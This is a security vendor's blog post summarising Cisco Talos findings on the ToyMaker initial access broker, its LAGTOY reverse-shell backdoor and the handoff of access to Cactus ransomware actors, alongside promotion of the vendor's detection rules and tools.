In recent years, the surge in cyber-attacks has been fueled by the expansion of Initial Access Broker (IABs) that trade access to breached networks. In 2023, security researchers revealed a widespread breach targeting critical infrastructure organizations orchestrated by a highly advanced threat group known as “ToyMaker,” which operated as an IAB. Hackers leverage exposed internet-facing systems to gain entry, then deploy custom backdoors, like LAGTOY, to harvest credentials from compromised organizations and partner under the radar with a double extortion group.
Detect ToyMaker Attacks
Initial Access Brokers (IABs) have become pivotal players in the cybercrime ecosystem, acting as intermediaries who infiltrate organizations and sell access to other malicious actors, often leading to ransomware attacks. Last year, the number of IAB sales on hacker forums surged by 23% compared to 2023, which also correlates with a significant increase in ransomware victims. The observed ToyMaker activity further proves this trend, highlighting the growing role of IABs in facilitating large-scale cyberattacks.
Register for SOC Prime Platform and access a set of relevant Sigma rules addressing ToyMaker TTPs along with a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Just press the Explore Detections button and immediately drill down to a curated detection stack.
All the rules are compatible with major SIEM, EDR, and Data Lake solutions, aligned with MITRE ATT&CK®, and enriched with metadata like CTI links, attack timelines, and triage tips.
Additionally, security professionals can hunt for IOCs from the latest Cisco research on ToyMaker. With Uncoder AI, security experts can effortlessly parse these IOCs and transform them into custom queries tailored for the chosen SIEM or EDR platform. Uncoder AI also acts as a non-agentic private AI for threat-informed detection engineering, equipping teams with advanced tools to research, code, validate, translate, and deploy detections on the fly.
ToyMaker Activity Analysis
In 2023, Cisco Talos discovered an extensive compromise in a critical infrastructure enterprise consisting of a combination of threat actors. From initial access to double extortion, these actors slowly and steadily compromised several hosts in the network. Their offensive capabilities relied on a coordinated use of SSH file transfer tools and dual-use remote admin utilities to ensure long-term access to breached networks. The IAB actors dubbed “ToyMaker” behind the attack are considered to be a financially motivated group that gains entry into high-value targets and then sells that access to secondary threat groups, which typically exploit it for double extortion and ransomware attacks.
Following the initial breach, ToyMaker performed reconnaissance, stole credentials, and deployed its custom backdoor, LAGTOY, which may have caused a compromise resulting in access handover to a secondary threat actor. More specifically, about three weeks later, Cactus ransomware actors were observed accessing the network using those harvested credentials. Though the group’s TTPs differ, the timeline suggests a clear handoff between ToyMaker and Cactus, reinforcing the need to track both threats separately while recognizing their connection.
Afterward, adversaries started an SSH listener on the endpoint using Windows OpenSSH. Another infected host connects and creates “sftp-server.exe” (the OpenSSH SFTP module), which downloads the Magnet RAM Capture tool. Using the same connection, attackers further download and run a custom reverse shell implant called “LAGTOY.” The malware can be used to create reverse shells and execute commands on infected endpoints. ToyMaker’s staple backdoor, LAGTOY, regularly contacts a hard-coded C2 server to receive and execute commands. Installed as a service, it includes basic anti-debugging by registering a custom unhandled exception filter that helps detect if it’s running under a debugger, preventing anti-malware analysis.
Cactus further maintained long-term access by deploying various remote admin tools across endpoints, including eHorus Agent (Pandora RC), AnyDesk, RMS Remote Admin, and Windows’ OpenSSH. These tools were downloaded from attacker-controlled servers using PowerShell and Impacket.
In another case, attackers used OpenSSH to create reverse shells, setting up scheduled tasks that connected hourly to the C2 server to receive and run commands. On some machines, they added unauthorized user accounts, likely to aid ransomware deployment. Cactus also heavily relies on Metasploit-injected versions of Windows binaries like PuTTY and ApacheBench to run code on compromised systems.
With a rise in cyber-attacks orchestrated by IABs and the increasing sophistication of such campaigns that might involve cooperation with double-extortion and ransomware gangs, organizations are seeking effective ways to reduce the risks of intrusions. SOC Prime curates a complete product suite to outscale cyber threats driven by a fusion of technologies with AI, automation, and real-time threat intelligence at its core.
The post ToyMaker Activity Detection: Initial Access Brokers Compromise Hosts in Critical Infrastructure Organizations via SSH and File Transfer Utilities appeared first on SOC Prime.
